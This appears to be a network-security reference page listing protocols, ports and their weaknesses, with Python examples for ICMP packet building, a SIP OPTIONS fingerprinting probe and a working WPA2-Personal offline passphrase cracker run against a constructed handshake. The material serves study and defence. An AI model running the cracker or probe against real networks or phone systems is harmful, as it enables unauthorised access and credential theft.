
Protocols & Terminology

1. Security & Authentication Protocols

Protocol | Acronym | Description
Wired Equivalent Privacy | WEP | Original 802.11 encryption (RC4 with a 24-bit IV); obsolete, the key is recoverable from captured traffic in minutes.
Wi-Fi Protected Access | WPA | Interim replacement for WEP built on TKIP; superseded by WPA2 and WPA3.
Temporal Key Integrity Protocol | TKIP | Per-packet RC4 keying used by WPA; deprecated and considered weak.
Pretty Good Privacy | PGP | Encryption and signing program for email and files (standardized as OpenPGP).
Internet Protocol Security | IPsec | Suite for authenticating and encrypting IP traffic (AH, ESP, IKE); the basis of most site-to-site and many remote-access VPNs.
Extensible Authentication Protocol | EAP | Authentication framework that carries many methods (EAP-TLS, PEAP, ...) over 802.1X and RADIUS.
Protected Extensible Authentication Protocol | PEAP | Runs an inner method (commonly MS-CHAPv2) inside a server-authenticated TLS tunnel; clients must validate the server certificate or a rogue access point can harvest credentials.
Lightweight Extensible Authentication Protocol | LEAP | Cisco proprietary EAP method based on MS-CHAP; broken, credentials are recoverable by offline dictionary attack.
Terminal Access Controller Access-Control System | TACACS / TACACS+ | AAA protocol for network device administration; TACACS+ (TCP/49) is Cisco's version and only obfuscates the packet body with a shared secret, so keep it on a management network.

2. Routing & Switching Protocols

Protocol | Acronym | Description
Routing Information Protocol | RIP | Distance-vector routing protocol (UDP/520); RIPv1 has no authentication, RIPv2 supports MD5 authentication.
Open Shortest Path First | OSPF | Link-state routing protocol for IP networks (IP protocol 89).
Interior Gateway Routing Protocol | IGRP | Obsolete Cisco proprietary distance-vector protocol.
Enhanced Interior Gateway Routing Protocol | EIGRP | Cisco's successor to IGRP, later published as RFC 7868.
VLAN Trunking Protocol | VTP | Cisco Layer 2 protocol that propagates VLAN definitions between switches; a switch joining the domain with a higher revision number can overwrite the VLAN database.
Virtual Local Area Network | VLAN | Logical segmentation of a switched network (802.1Q tagging).
Spanning Tree Protocol | STP | Prevents Layer 2 loops; on unprotected access ports an attacker can claim the root bridge (mitigate with BPDU Guard and Root Guard).
Hot Standby Router Protocol | HSRP | Cisco first-hop redundancy protocol for gateway failover.
Virtual Router Redundancy Protocol | VRRP | Open-standard equivalent of HSRP (RFC 5798).

3. Core Network & Application Protocols

Protocol | Acronym | Description
Secure Shell | SSH | Encrypted remote login, command execution and tunnelling (TCP/22); the replacement for Telnet, rsh and rlogin.
File Transfer Protocol | FTP | Transfers files over a network; credentials and data are cleartext, prefer SFTP or FTPS.
Hypertext Transfer Protocol | HTTP | Web request/response protocol; HTTPS is HTTP over TLS.
Simple Mail Transfer Protocol | SMTP | Sends and relays email between mail servers.
Network Time Protocol | NTP | Synchronizes clocks over a network; an open NTP server can be abused for reflection/amplification DDoS.
Network Address Translation | NAT | Not a protocol but a router function that lets many private hosts share one public IP address.
Internet Key Exchange | IKE | Negotiates IPsec security associations and keys (UDP/500, UDP/4500 with NAT traversal).
Generic Routing Encapsulation | GRE | Tunnels arbitrary packets (IP protocol 47); provides no encryption or authentication on its own and is usually combined with IPsec.
Remote Shell | RSH | Legacy Berkeley r-command (TCP/514) that runs commands remotely with cleartext, host-based trust; should be disabled.

4. File & Resource Sharing Protocols

Protocol | Acronym | Description
Server Message Block | SMB | Windows file and printer sharing (TCP/445); SMBv1 is obsolete and should be disabled, and SMB signing should be required where possible.
Network File System | NFS | Unix remote file sharing (TCP/UDP 2049); NFSv3 exports restricted only by client IP are trivially spoofed, use NFSv4 with Kerberos (sec=krb5).
Simple Network Management Protocol | SNMP | Monitors and manages network devices (UDP/161, traps on 162); v1/v2c send the community string in cleartext, v3 adds authentication and encryption.

5. Virtual Private Network (VPN) & Tunneling

Protocol | Acronym | Description
Virtual Private Network | VPN | Secure, encrypted tunnel between endpoints across an untrusted network.
Point-to-Point Tunneling Protocol | PPTP | Legacy VPN protocol (TCP/1723 plus GRE); obsolete and insecure because its MS-CHAPv2 authentication can be broken offline.

6. Web Technologies & Internet Standards

Protocol | Acronym | Description
Uniform Resource Locator | URL | The address of a resource, e.g. https://example.com/path?q=1.
Uniform Resource Identifier | URI | The broader identifier syntax of which URLs (and URNs) are a subset.
Asynchronous JavaScript and XML | AJAX | Technique for updating page content through background HTTP requests (XMLHttpRequest or fetch) without a full reload.
Internet Server Application Programming Interface | ISAPI | Microsoft API for writing extensions and filters that run inside IIS.

7. Voice & Multimedia Protocols

Protocol | Acronym | Description
Session Initiation Protocol | SIP | Signaling protocol that sets up, modifies and tears down voice and video sessions; the media itself travels separately over RTP.
Voice over IP | VoIP | Carrying telephone calls over IP networks instead of the traditional phone network.

8. Network Management & Monitoring

Protocol | Acronym | Description
Cisco Discovery Protocol | CDP | Cisco proprietary Layer 2 protocol that advertises device model, software version, IP address and VLAN to neighbours in cleartext; disable it on untrusted ports because it hands reconnaissance data to anyone listening.
Systems Management Server | SMS | Microsoft's systems management suite, since renamed System Center Configuration Manager (SCCM / MECM).
Microsoft Baseline Security Analyzer | MBSA | Discontinued Microsoft tool for checking missing patches and common misconfigurations.
Supervisory Control and Data Acquisition | SCADA | Industrial control architecture for monitoring and controlling physical processes; typically runs legacy protocols with no authentication, so network isolation is the main control.

Transmission Control Protocol

1. Transmission Control & Communication Protocols

Protocol | Acronym | Port | Description
Transmission Control Protocol | TCP | IP protocol 6 (no port of its own) | Connection-oriented transport: three-way handshake, sequencing, retransmission, flow and congestion control.
Internet Control Message Protocol | ICMP | IP protocol 1; no ports (message types 0-255) | Error reporting and diagnostics (ping, traceroute).
Internet Group Management Protocol | IGMP | IP protocol 2; no ports | Multicast group membership signalling between hosts and routers.

2. Remote Access & Management

Protocol | Acronym | Port | Description
Telnet | Telnet | 23 | Cleartext remote login; credentials and sessions are sniffable, replace with SSH.
Secure Shell | SSH | 22 | Encrypted remote login, command execution and port forwarding.
Remote Desktop Protocol | RDP | 3389 | Windows remote desktop; enforce Network Level Authentication and never expose it directly to the internet.
Remote Execution | REXEC | 512 | Berkeley r-command that runs a command with a cleartext username and password.
Remote Login | RLOGIN | 513 | Berkeley r-command for interactive shells; trust is by source IP and .rhosts, which is spoofable.
Remote Shell | RSH | 514 | Berkeley r-command for non-interactive commands with the same host-based trust model.

3. Web & Application Layer Protocols

Protocol | Acronym | Port | Description
Hypertext Transfer Protocol | HTTP | 80 | Cleartext web traffic.
Hypertext Transfer Protocol Secure | HTTPS | 443 | HTTP over TLS.
Simple Object Access Protocol | SOAP | 80, 443 | XML messaging for web services carried over HTTP(S).
Secure Sockets Layer / Transport Layer Security | SSL/TLS | none of its own | Transport security layer underneath HTTPS (443), SMTPS (465), LDAPS (636) and others; SSL 2.0/3.0 are broken and deprecated, use TLS 1.2 or 1.3.
Squid Web Proxy | HTTP-Proxy | 3128 | Caching and forwarding HTTP proxy; an open proxy lets outsiders pivot into internal networks.

4. Email & Messaging Protocols

Protocol | Acronym | Port | Description
Simple Mail Transfer Protocol | SMTP | 25 (relay), 587 (submission with STARTTLS), 465 (implicit TLS) | Sends and relays email.
Post Office Protocol v3 | POP3 | 110 (995 over TLS) | Downloads email from a mailbox.
Internet Message Access Protocol | IMAP | 143 (993 over TLS) | Reads and manages mail on the server.
Network News Transfer Protocol | NNTP | 119 (563 over TLS) | Accesses Usenet newsgroups.

5. File Transfer & Storage Protocols

Protocol | Acronym | Port | Description
File Transfer Protocol | FTP | 21 (control), 20 (active-mode data) | Transfers files; cleartext, prefer SFTP (over SSH) or FTPS.
Trivial File Transfer Protocol | TFTP | UDP/69 (not TCP) | Minimal, unauthenticated file transfer used for network boot and device configuration; frequently leaks firmware and config files.
Server Message Block | SMB | 445 (139 over NetBIOS) | Shares files and printers.
Network File System | NFS | 111 (rpcbind/portmapper), 2049 | Mounts remote file systems.
Secure Copy Protocol | SCP | 22 | File copy over SSH.

6. Network Services & Addressing

Protocol | Acronym | Port | Description
Domain Name System | DNS | 53 | Resolves names; UDP by default, TCP for zone transfers (AXFR) and responses too large for UDP.
Dynamic Host Configuration Protocol | DHCP | UDP/67 (server), UDP/68 (client) | Assigns addresses and network parameters; UDP only.
Bootstrap Protocol | BOOTP | UDP/67, UDP/68 | Predecessor of DHCP that uses the same packet format.
Network Time Protocol | NTP | UDP/123 | Clock synchronization; UDP only.

7. Security & Authentication Protocols

Protocol | Acronym | Port | Description
Kerberos | Kerberos | 88 (TCP/UDP), 464 (password change) | Ticket-based authentication, the core of Active Directory logon.
Lightweight Directory Access Protocol | LDAP | 389 (636 for LDAPS) | Directory queries and authentication; 389 is cleartext unless StartTLS is negotiated.
Remote Authentication Dial-In User Service | RADIUS | UDP/1812 (authentication), UDP/1813 (accounting); legacy 1645/1646 | AAA for network access (802.1X, VPN); only the password attribute is obfuscated, so run it over a trusted network or RadSec.
Kerberized Internet Negotiation of Keys | KINK | UDP/910 | Establishes IPsec security associations using Kerberos instead of IKE (RFC 4430).

8. Database Protocols

Protocol | Acronym | Port | Description
Microsoft SQL Server | MS-SQL-S | 1433 | Client connections to SQL Server (UDP/1434 is the Browser service).
Oracle Database Listener | Oracle-TNS | 1521 (1526 alternate) | TNS listener accepting Oracle client connections.
Ingres Lock | Ingreslock | 1524 | Ingres lock manager; the port is better known as the bind-shell backdoor found on deliberately vulnerable targets such as Metasploitable.
IBM DB2 | DB2 | 50000 | DB2 client connections.
MySQL | MySQL | 3306 | MySQL/MariaDB client connections (TCP).
PostgreSQL | PGSQL | 5432 | PostgreSQL client connections (TCP).

9. Routing & VPN Protocols

Protocol | Acronym | Port | Description
Open Shortest Path First | OSPF | IP protocol 89 (no port) | Link-state interior routing; runs directly over IP.
Point-to-Point Tunneling Protocol | PPTP | 1723 plus GRE (IP protocol 47) | Legacy VPN control channel; obsolete and insecure.
Internet Security Association and Key Management Protocol | ISAKMP / IKE | UDP/500 (UDP/4500 for NAT traversal) | Negotiates IPsec security associations; UDP, not TCP.

10. VoIP & Communication Protocols

Protocol | Acronym | Port | Description
Session Initiation Protocol | SIP | 5060 (UDP/TCP), 5061 (TLS) | VoIP signalling; the call media uses RTP on dynamically negotiated UDP ports.

11. Miscellaneous Protocols

Protocol | Acronym | Port | Description
Identification Protocol | Ident | 113 | Reports which local user owns a TCP connection; leaks usernames, disable it.
TCP Wrappers | TCPW | none (host library, not a service) | Host-based access control (hosts.allow / hosts.deny) for wrapped daemons; nmap labels a port "tcpwrapped" when the connection is accepted and immediately closed.
X Window System | X11 | 6000-6063 (display :0 is 6000) | Networked GUI; an X server opened with "xhost +" lets anyone on the network capture keystrokes and screen contents.

User Datagram Protocol (UDP)

Methodology

UDP is a connectionless transport protocol that sends data packets without establishing a prior connection or ensuring their arrival. It operates with minimal overhead, making it faster than TCP but less reliable. UDP is widely used in real-time applications where speed is prioritized over accuracy.

Limitations

  • No retransmission: only an optional (IPv4) or mandatory (IPv6) checksum, so corrupted or lost datagrams are simply dropped.
  • No ordering or delivery guarantee: datagrams may arrive duplicated, out of order, or not at all.
  • No built-in congestion control, so a misbehaving sender can flood a path.
  • Connectionless, so the source address is never verified: spoofed requests to services that answer with more data than they receive (DNS, NTP, SSDP) are the basis of reflection/amplification attacks.

Here’s a summarized table of UDP protocols and their ports:

Protocol | Acronym | Port | Description
Domain Name System | DNS | 53 | Resolves domain names to IP addresses (TCP/53 for zone transfers and large responses).
Trivial File Transfer Protocol | TFTP | 69 | Unauthenticated file transfer used for network boot and device configuration.
Network Time Protocol | NTP | 123 | Synchronizes clocks; the "monlist" command on old servers was a major amplification vector.
Simple Network Management Protocol | SNMP | 161 (traps on 162) | Monitors and manages network devices; v1/v2c community strings are cleartext.
Routing Information Protocol | RIP | 520 | Exchanges routing information between routers; unauthenticated RIPv1 accepts injected routes.
Internet Key Exchange | IKE | 500 (4500 with NAT-T) | Negotiates IPsec security associations and keys.
Internet Protocol Security | IPsec | no UDP port of its own: ESP is IP protocol 50 and AH is IP protocol 51; only IKE (500) and NAT-T (4500) use UDP | Encrypts and authenticates IP packets, commonly in VPNs.
Bootstrap Protocol / Dynamic Host Configuration Protocol | BOOTP, DHCP | 67 (server), 68 (client) | Address assignment; the client broadcasts from 68 to 67.
Syslog | SYSLOG | 514 | Unencrypted, unauthenticated log transport; anyone on the path can read or inject events (prefer TLS syslog on TCP/6514).
NetBIOS Name Service | netbios-ns | 137 | Resolves NetBIOS names to IPs on Windows networks; spoofed name responses make it a classic credential-capture vector, disable it where not needed.
Microsoft SQL Server Browser | ms-sql-m | 1434 | Tells clients which port named SQL Server instances listen on.
Universal Plug and Play (SSDP) | UPnP | 1900 | Lets devices discover each other; must never be reachable from the internet.
X Display Manager Control Protocol | XDMCP | 177 | Remote graphical login for X11 displays; cleartext.
Remote Desktop Protocol (Terminal Services) | RDP | 3389 | Microsoft Terminal Services; TCP/3389 is the primary transport, UDP/3389 carries the RDP 8+ transport.

The following services also appear in the original list but are TCP-only and do not listen on UDP: Telnet (23), MySQL (3306), PostgreSQL (5432), VNC (5900), X11 (6000-6063), IRC (194, more commonly 6667) and OpenPGP HKP keyservers (11371).

ICMP (Internet Control Message Protocol)

Overview

ICMP is a network protocol used for error reporting, diagnostics, and status communication between devices. It helps in troubleshooting and determining network connectivity.

ICMP Requests

  • Echo Request (type 8): Checks whether a device is reachable (the ping command).
  • Timestamp Request (type 13): Retrieves the current time from a remote device.
  • Address Mask Request (type 17): Requests the subnet mask of a device.
  • Timestamp and Address Mask requests are largely obsolete; hosts that still answer them leak clock and subnet information, so they are normally filtered at the perimeter.

ICMP Messages

Message (type) | Description
Echo Reply (0) | Response to an Echo Request.
Destination Unreachable (3) | Sent when a packet cannot be delivered; the code indicates why (network, host, port unreachable, fragmentation needed, ...).
Redirect (5) | Tells a host to use a different gateway; routers and hosts usually ignore or disable it because spoofed redirects can reroute traffic.
Time Exceeded (11) | TTL reached zero in transit (what traceroute relies on) or fragment reassembly timed out.
Parameter Problem (12) | A packet header field could not be processed.
Source Quench (4) | Asked a sender to slow down; deprecated (RFC 6633) and ignored by modern stacks.

ICMP Versions

  • ICMPv4: Used with IPv4 networks.
  • ICMPv6: Used with IPv6, where it also carries Neighbor Discovery and router advertisements, so it cannot be blocked wholesale without breaking basic connectivity.

Time-To-Live (TTL) and ICMP

  • TTL is a field in the IPv4 header (Hop Limit in IPv6) that limits how long a packet can circulate.
  • Each router that forwards the packet decrements the TTL by one.
  • When TTL reaches 0, the router discards the packet and returns an ICMP Time Exceeded message; traceroute maps a path by sending probes with TTL 1, 2, 3, ... and recording who replies.
  • The TTL observed in a reply can estimate distance (hops) and hint at the sender's operating system, because stacks start from different defaults:
    • Windows: default TTL = 128
    • Linux/macOS/BSD: default TTL = 64
    • Solaris and most network devices: default TTL = 255
  • This is only a heuristic: the default is configurable, and an observed value of 60 could be a Linux host 4 hops away or a Windows host 68 hops away (the former is far more likely).
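The ICMP echo format, its checksum, and the TTL heuristic above, as an added worked example written for this page (it is not code from the original page). It builds an Echo Request with the RFC 1071 checksum, verifies a received message, and buckets an observed TTL against the default values listed above; the packet contents and TTL values it is fed are constructed for illustration.

```python
import struct
from typing import Dict, Tuple

ICMP_ECHO_REQUEST = 8
ICMP_ECHO_REPLY = 0

# Common default initial TTLs (the same values as in the list above).
INITIAL_TTLS = {64: "Linux/macOS/BSD", 128: "Windows", 255: "Solaris/network devices"}


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over 16-bit words (shared by IP, ICMP, UDP and TCP)."""
    if len(data) % 2:
        data += b"\x00"  # an odd trailing byte is padded with zero for the sum only
    total = 0
    for i in range(0, len(data), 2):
        total += (data[i] << 8) | data[i + 1]
    while total >> 16:  # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo_request(ident: int, seq: int, payload: bytes) -> bytes:
    """ICMP Echo Request: type(1) code(1) checksum(2) identifier(2) sequence(2) followed by the payload."""
    header = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, ident, seq)
    csum = inet_checksum(header + payload)  # computed with the checksum field zeroed
    return struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, csum, ident, seq) + payload


def parse_icmp(packet: bytes) -> Dict[str, object]:
    """Parse an ICMP message (as delivered after the IP header) and verify its checksum."""
    if len(packet) < 8:
        raise ValueError("ICMP header is 8 bytes")
    icmp_type, code, _csum, ident, seq = struct.unpack("!BBHHH", packet[:8])
    # Summing the whole message with the original checksum in place yields 0 only if it is intact.
    return {
        "type": icmp_type,
        "code": code,
        "id": ident,
        "seq": seq,
        "payload": packet[8:],
        "checksum_ok": inet_checksum(packet) == 0,
    }


def infer_from_ttl(observed_ttl: int) -> Tuple[int, int, str]:
    """Guess the sender's initial TTL as the smallest common default that is >= the observed value.

    Returns (initial_ttl, estimated_hops, likely_platform). Heuristic only: defaults are
    configurable, and a path longer than 64 hops would mis-bucket a Linux host as Windows.
    """
    if not 1 <= observed_ttl <= 255:
        raise ValueError("TTL must be 1..255")
    for initial in sorted(INITIAL_TTLS):
        if observed_ttl <= initial:
            return initial, initial - observed_ttl, INITIAL_TTLS[initial]
    raise AssertionError("unreachable: 255 covers every valid TTL")


if __name__ == "__main__":
    pkt = build_echo_request(0x1234, 1, b"ping-payload")
    print(pkt.hex(), parse_icmp(pkt))
    print(infer_from_ttl(52))  # a reply seen with TTL 52 -> (64, 12, 'Linux/macOS/BSD')
```

Sending the packet needs a raw socket (root/CAP_NET_RAW); the parser expects the ICMP bytes after the IP header, which a raw socket on Linux includes, so strip the first 20 bytes (or IHL*4) before calling parse_icmp.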

VoIP (Voice over Internet Protocol)

Overview

VoIP enables voice and multimedia communication over the internet instead of traditional phone lines. Popular VoIP applications include Skype, WhatsApp, Google Hangouts, Slack, and Zoom.

Common VoIP Ports

  • UDP/5060 and TCP/5060 → Session Initiation Protocol (SIP), the most common VoIP signaling protocol, in cleartext; TCP/5061 → SIP over TLS (SIPS).
  • TCP/1720 → H.323 call signaling (H.225), an older ITU multimedia suite.
  • The audio itself is carried separately over RTP on dynamically negotiated UDP ports; without SRTP it is unencrypted and can be reassembled from a capture.

SIP (Session Initiation Protocol)

SIP is responsible for initiating, maintaining, modifying, and terminating real-time communication sessions.

Method Description
INVITE Initiates a session or invites another user.
ACK Confirms receipt of an INVITE request.
BYE Terminates a session.
CANCEL Cancels a pending INVITE request.
REGISTER Registers a SIP user agent (UA) with a SIP server.
OPTIONS Requests information about a SIP server’s capabilities.

Security & Information Disclosure Risks

  • SIP extensions can be enumerated: REGISTER or INVITE probes for different usernames often receive different response codes (for example 401 for an existing user but 403 or 404 for an unknown one), which then drives password guessing against the valid accounts.
  • An OPTIONS request needs no credentials and returns the Allow, Accept, Supported and User-Agent headers, fingerprinting the PBX software and the methods and media it accepts.
  • Cisco IP phones download their SEP<MAC>.cnf.xml configuration files from the Cisco Unified Communications Manager (CUCM) TFTP service; if that TFTP server is reachable, an attacker can pull phone configurations, which can reveal server addresses, credentials and other details useful for further attacks.
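The OPTIONS probe described above, as an added example written for this page (not code from the original page or from any PBX vendor). It builds an RFC 3261 OPTIONS request and parses a response into the capability headers an assessor looks at; the reply it parses offline is a constructed sample, and the hostnames, addresses and the ExamplePBX user agent are invented for illustration.

```python
import socket
import uuid
from typing import Dict, List


def build_options_request(target: str, local_host: str, local_port: int = 5060) -> bytes:
    """Construct an RFC 3261 OPTIONS request to sip:<target>; headers are CRLF-terminated and the body is empty."""
    branch = "z9hG4bK" + uuid.uuid4().hex[:16]  # RFC 3261 branches must start with this magic cookie
    lines = [
        f"OPTIONS sip:{target} SIP/2.0",
        f"Via: SIP/2.0/UDP {local_host}:{local_port};branch={branch};rport",
        f"From: <sip:probe@{local_host}>;tag={uuid.uuid4().hex[:8]}",
        f"To: <sip:{target}>",
        f"Call-ID: {uuid.uuid4().hex}@{local_host}",
        "CSeq: 1 OPTIONS",
        "Max-Forwards: 70",
        "Accept: application/sdp",
        "Content-Length: 0",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def parse_sip_response(raw: bytes) -> Dict[str, object]:
    """Parse a SIP response into status, user agent and the comma-separated capability headers."""
    head, _, body = raw.decode("utf-8", errors="replace").partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    parts = status_line.split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("SIP/") or not parts[1].isdigit():
        raise ValueError(f"not a SIP response: {status_line!r}")
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if not sep:
            continue  # tolerate a junk line rather than abort the whole parse
        name = name.strip().lower()  # header names are case-insensitive
        value = value.strip()
        headers[name] = f"{headers[name]}, {value}" if name in headers else value  # repeated list headers merge

    def as_list(name: str) -> List[str]:
        return [v.strip() for v in headers.get(name, "").split(",") if v.strip()]

    return {
        "code": int(parts[1]),
        "reason": parts[2] if len(parts) > 2 else "",
        "user_agent": headers.get("user-agent") or headers.get("server", ""),
        "methods": as_list("allow"),
        "accept": as_list("accept"),
        "supported": as_list("supported"),
        "body": body,
    }


def probe(host: str, local_host: str, port: int = 5060, timeout: float = 2.0) -> Dict[str, object]:
    """Send one OPTIONS over UDP and parse the reply (needs network access; not used by the offline sample)."""
    request = build_options_request(host, local_host)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(request, (host, port))
        data, _ = sock.recvfrom(65535)
    return parse_sip_response(data)


# Constructed sample reply (not captured from a real system) in the shape a PBX returns to OPTIONS.
SAMPLE_RESPONSE = (
    b"SIP/2.0 200 OK\r\n"
    b"Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK0123456789abcdef;rport=5060;received=192.0.2.10\r\n"
    b"From: <sip:probe@192.0.2.10>;tag=1a2b3c4d\r\n"
    b"To: <sip:pbx.example.test>;tag=9f8e7d6c\r\n"
    b"Call-ID: 0123456789abcdef0123456789abcdef@192.0.2.10\r\n"
    b"CSeq: 1 OPTIONS\r\n"
    b"Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY\r\n"
    b"Accept: application/sdp\r\n"
    b"Supported: replaces, timer\r\n"
    b"User-Agent: ExamplePBX/1.2.3\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    print(build_options_request("pbx.example.test", "192.0.2.10").decode())
    print(parse_sip_response(SAMPLE_RESPONSE))
```

On the defensive side the same parser shows what to strip: a PBX that answers OPTIONS from unauthenticated sources with a detailed User-Agent is advertising its patch level to anyone who asks.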

VoIP is widely used but also presents security risks, making encryption and proper configurations essential for safe communications. 🔒


Wireless Networks

Methodology

Wireless networks use radio frequency (RF) technology to enable communication without physical connections. Devices such as laptops, smartphones, and tablets connect to a Wireless Access Point (WAP), which acts as a bridge to the wired network.

Types of Wireless Networks

  1. Personal Area Network (PAN) – Short-range networks (e.g., Bluetooth, Zigbee).
  2. Local Area Network (LAN) – Common WiFi networks using IEEE 802.11 standards.
  3. Metropolitan Area Network (MAN) – Covers a city using technologies like WiMAX.
  4. Wide Area Network (WAN) – Long-distance communication using cellular networks (e.g., 4G, 5G).

WiFi Communication Process

  1. Discovery: The client listens for beacons or sends probe requests; access points answer with probe responses listing the SSID, supported rates and security capabilities.
  2. 802.11 Authentication: Open System authentication (effectively none) for WPA2, or the SAE exchange for WPA3-Personal.
  3. Association: The client sends an association request carrying its MAC address, the SSID, supported data rates and its RSN (security) capabilities; the AP assigns an association ID.
  4. Key establishment: WPA-Personal runs the 4-way handshake directly from the pre-shared key. WPA-Enterprise first runs 802.1X/EAP (PEAP or EAP-TLS; LEAP is obsolete) against a RADIUS server to produce the PMK, then the same 4-way handshake.
  5. Data Transmission: Once keys are installed, encrypted frames flow over RF channels using 802.11ac, 802.11ax (WiFi 6) or newer.

Security Mechanisms

Wireless networks implement security measures to prevent unauthorized access and data breaches:

  • WEP (Wired Equivalent Privacy) – RC4 with a 24-bit IV and a CRC-32 integrity check; IV reuse and key-recovery attacks break it in minutes.
  • WPA (WiFi Protected Access) – TKIP wrapped around RC4 as a stopgap for WEP hardware; deprecated and still vulnerable.
  • WPA2 – AES-CCMP encryption and the common baseline. KRACK (2017) was a key-reinstallation flaw in client implementations of the 4-way handshake, fixed by vendor patches; the bigger operational risk in WPA2-Personal is that a single captured handshake lets an attacker test passphrases offline.
  • WPA3 – Replaces the PSK handshake with SAE (Dragonfly), so a captured exchange cannot be cracked offline, and makes management-frame protection mandatory.
  • Authentication Protocols (WPA-Enterprise / 802.1X):
    • LEAP (Lightweight EAP) – Cisco's proprietary method; broken and should not be deployed.
    • PEAP (Protected EAP) – Tunnels the inner authentication in TLS; the critical control is that clients validate the server certificate, otherwise an evil-twin AP collects the credentials.
    • EAP-TLS – Mutual certificate authentication; the strongest common option.
    • RADIUS – The AAA server 802.1X hands the EAP exchange to. TACACS+ is a related AAA protocol but is used for network device administration, not for authenticating Wi-Fi clients.
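Why one captured WPA2-Personal handshake is enough for an offline attack, as an added example written for this page (not code from the original page). It implements the key derivation the standard specifies (PBKDF2 for the PMK, PRF-512 for the PTK, HMAC-SHA1 for the EAPOL MIC) and then runs a small dictionary attack against a "capture" that is constructed inside the block: the SSID, MAC addresses, nonces, passphrase and the EAPOL message 2 frame are all invented here, and a real attack would take them from a pcap instead.

```python
import hashlib
import hmac
from typing import Iterable, Optional

PTK_LABEL = b"Pairwise key expansion"


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal PMK (= PSK): PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, concatenated, first 64 bytes."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA) || max(AA,SPA) || min(nonces) || max(nonces))."""
    data = min(ap_mac, client_mac) + max(ap_mac, client_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, PTK_LABEL, data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with its 16-byte MIC field zeroed)[:16].

    KCK is the first 16 bytes of the PTK; the MIC field starts at byte 81 of the EAPOL frame.
    """
    zeroed = eapol_frame[:81] + b"\x00" * 16 + eapol_frame[97:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_m2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal EAPOL-Key message 2/4 (constructed for this example; no RSN IE in the key data field)."""
    key_info = 0x010A  # descriptor version 2 (HMAC-SHA1/AES), Pairwise bit, MIC bit
    body = (
        bytes([2])                      # descriptor type: RSN
        + key_info.to_bytes(2, "big")
        + (16).to_bytes(2, "big")       # key length
        + (1).to_bytes(8, "big")        # replay counter
        + snonce                        # 32-byte nonce
        + b"\x00" * 16                  # key IV
        + b"\x00" * 8                   # key RSC
        + b"\x00" * 8                   # reserved / key ID
        + mic
        + (0).to_bytes(2, "big")        # key data length
    )
    return bytes([1, 3]) + len(body).to_bytes(2, "big") + body  # EAPOL version 1, type 3 (EAPOL-Key)


def crack_psk(ssid: str, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes,
              eapol_m2: bytes, captured_mic: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: recompute the MIC for each candidate passphrase and compare with the capture."""
    for candidate in wordlist:
        kck = derive_ptk(derive_pmk(candidate, ssid), ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_m2), captured_mic):
            return candidate
    return None


# Constructed "capture": addresses, nonces and passphrase chosen for this example, not from a real network.
SSID = "corp-wifi"
AP_MAC = bytes.fromhex("001122334455")
CLIENT_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
TRUE_PASSPHRASE = "correct horse battery"
_kck = derive_ptk(derive_pmk(TRUE_PASSPHRASE, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
CAPTURED_MIC = eapol_mic(_kck, build_eapol_m2(SNONCE))
EAPOL_M2 = build_eapol_m2(SNONCE, CAPTURED_MIC)  # the frame as it would appear on the air, MIC filled in

if __name__ == "__main__":
    print(crack_psk(SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE, EAPOL_M2, CAPTURED_MIC,
                    ["letmein", "Password1", TRUE_PASSPHRASE]))
```

Everything the attacker needs (SSID, both MACs, both nonces, message 2 with its MIC) is visible in cleartext in the handshake, which is why a deauthentication attack followed by a capture is enough; the only cost per guess is the 4096-round PBKDF2, so passphrase length and entropy, or moving to WPA3-SAE, is the defence.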

Limitations

  1. WEP Security Flaws – IV reuse and the linear CRC-32 integrity check let attackers decrypt and inject traffic.
  2. Deauthentication/Disassociation Attacks – Spoofed management frames force clients off the network (and are used to provoke a fresh handshake for capture); 802.11w protected management frames, mandatory in WPA3, mitigate this.
  3. Backward Compatibility Issues – Older devices may not support WPA3, and a mixed-mode network falls back to the weakest member, so transition modes weaken the whole SSID.
  4. Signal Interference – Wireless signals are affected by walls, electronic devices and environmental factors.
  5. Limited IV Size in WEP – The 24-bit IV space is exhausted within hours on a busy network, guaranteeing keystream reuse.
  6. Man-in-the-Middle (MITM) Attacks – Rogue or evil-twin access points with a matching SSID attract auto-joining clients; with enterprise authentication and no server certificate validation they also collect credentials.

